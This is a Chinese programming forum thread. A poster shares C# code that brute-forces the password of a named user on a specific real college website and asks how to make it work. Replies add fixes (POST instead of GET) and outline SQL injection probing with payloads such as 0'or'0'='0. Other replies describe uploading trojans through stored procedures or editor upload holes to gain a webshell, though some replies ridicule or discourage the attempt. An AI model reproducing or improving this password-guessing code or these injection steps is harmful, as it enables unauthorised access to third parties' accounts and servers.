破解网站---> 请支招!!!
我想试试能不能破解网站:
分享一下我的代码,谁有更好方法,不仿提提
下面是我的C# code:
richTextBox1 ===>展示页面内容。
txtURL ===>j 是有于显示密码的。
下面是被攻网站描述:
基本
该网站有图片: images/login.gif 作为登录按钮!
用户名的输入控件:<input id='textfield' ...
密码 的输入控件:<input id='textfield2' ...
登录成功后的行为:
如果登录成功 会定向到 用户信息页,就没有 登录按钮 了,
--->
C# code
private void txtJD_Click(object sender, EventArgs e)
{
string JD = @"http://www.gdmec.com?textfield=06100511";// &textfield2=0511
int i=0;
for (int j = 1; j <= 10; j++)
{
int min = (int)(1 * Math.Pow(10, (double)j));
int max = (int)(2 * Math.Pow(10, (double)j));
for (i = min; i < max; i++)
{
WebClient wc = new WebClient();
wc.Encoding = Encoding.UTF8;
string url = JD + "&textfield2=" + i.ToString().Substring(1, j);
string DownStr = wc.DownloadString(url);
txtURL.Text = i.ToString().Substring(1, j);
if (!DownStr.Contains("images/login.gif"))
{
richTextBox1.Text = DownStr;
txtURL.Text = i.ToString().Substring(1, j);
break;
}
}
}
}
我让 此程序运行一个下午都没有找到 用户名:06100511 的密码。
谁知乍回事。
谢谢提点。
------解决方案--------------------這種事情,,哎哎,不敢
------解决方案--------------------在url后的是 GET模式。
如果是aspx网站默认的是 POST模式。
它的网站没有做验证码和错误次数限制?
------解决方案--------------------lz 语言 颜色好丰富啊
------解决方案--------------------
------解决方案--------------------灰常精彩的代码
------解决方案--------------------SQL 注入有很多种,0'or'0'='0 是其中的一种
还有可以通过url.aspx?id=10这种页面,如果页面对于输入的参数没有严格限定类型,而且sql语句又是通过拼接的方式的,就可以直接注入,注入方法如下
1、在地址栏输入url.aspx?id=10' 加单引号,这时页面会返回错误页面将会暴出使用何种数据库,这一步也是用来检查是否存在注入漏洞的,如果对方关闭了详细错误信息还可以通过url.aspx?id=10 and 1=1等来判断
2、根据对方使用的数据库类型在构造注入的sql语句,如果是sql server,可以这样构造
url.aspx?id=10;sql server的系统存储过程上传木马-- 前提是对方使用sa作为数据库连接用户
其实这些现在都有现成的工具去做
编辑器的上传漏洞 这个就是利用大部分网站使用的富文本编辑器存在的上传漏洞,上传木马文件到服务器上,再通过这些木马控制服务器获得服务器的管理权限,
webshell 就是通过上面的sql注入或上传漏洞,获得了服务器的控件权限,最终拿到服务器的管理账号密码,想随便改网站的内容都可以了
------解决方案--------------------心思用对地方 。。
------解决方案--------------------LZ真会扯
------解决方案--------------------看着你写的代码就知道你有多愚蠢
如果你要做坏人 那么请记住坏人的第一天职业守则:不要把你想害的人当白痴,除非你自己是白痴。
想学破解?很简单。
三个东西学好了,你根本不需要人教:数学建模 编程思想 人类心理学
其他的 别想了
没人会告诉你怎么去破解别人的网站 就算会他们也不会告诉你——除非他跟你一样愚蠢
------解决方案--------------------破解网站大部分是找漏洞,比如上传的漏洞,可以上传图片(木马),过滤不严格的就可以使用工具来修改后缀,执行木马得到webshell 其实这些都有工具可以用,不过没有什么意思,还是走正道吧 嘿嘿!
------解决方案--------------------
------解决方案--------------------乌鸦飞过~~~~~ 大家淡定
------解决方案--------------------lz你这样以后回你贴的人会越来越少。